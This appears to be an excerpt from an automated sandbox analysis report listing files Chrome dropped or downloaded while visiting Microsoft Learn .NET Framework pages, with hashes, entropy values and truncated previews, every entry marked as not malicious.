                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....!....@......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I{Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V{Y.|....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V{Y.|...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V{Y.|....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{B......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 14:32:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                                                                              Entropy (8bit):3.9909671705093803
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:8++bdFuTAJbH5ZidAKZdA1mehBiZUk1W1qehTy+C:8+uusJdt9zy
                                                                                                                                                                                                                                                              MD5:43077A54D1781F324DD20E57D0A7F582
                                                                                                                                                                                                                                                              SHA1:D734FDDD24AEFD88AFF3A53FE1AAF8722034BA89
                                                                                                                                                                                                                                                              SHA-256:70C95C0F3F990418BD5144833B761C8A16049E8E1736AFF9EBAEBECCFF7EE443
                                                                                                                                                                                                                                                              SHA-512:B73BF5312DBED80FDB8D1299C82D1F024F072CD8E3F8633A12C2ECC81B133111A2026132687AC538C73EF1EACF098ED60551ADAE7F729EA431D9442E6D8E80D6
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....h...@......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I{Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V{Y.|....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V{Y.|...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V{Y.|....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{B......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 14:32:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                                                                                              Entropy (8bit):4.0015011446209705
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:8H9+bdFuTAJbH5ZidAKZdA1duT1ehOuTbbiZUk5OjqehOuTbdy+yT+:8H9uusJdETyTbxWOvTbdy7T
                                                                                                                                                                                                                                                              MD5:42F3AAC1344ED052E2625014DBDE3957
                                                                                                                                                                                                                                                              SHA1:C98BF61620542B57853BCAEBF7ED7091B778D335
                                                                                                                                                                                                                                                              SHA-256:78ACBD5E3A3923510E2F92B309B75B06D459C89E40C7C81B2A8676C7993D03BB
                                                                                                                                                                                                                                                              SHA-512:4CFEDB3670E155EA2D0BD2CAAFF9E33D4A65F5E36F8C35FC5BE958C1C68EED029BBCCFB26A313B4FE53957BBF2CBDF235AE125A79EC146BAF1EE4A978B9D0170
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,..../..@......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I{Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V{Y.|....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V{Y.|...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V{Y.|....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{B......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):64291
                                                                                                                                                                                                                                                              Entropy (8bit):7.964191793580486
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                                                                              MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                                                                              SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                                                                              SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                                                                              SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
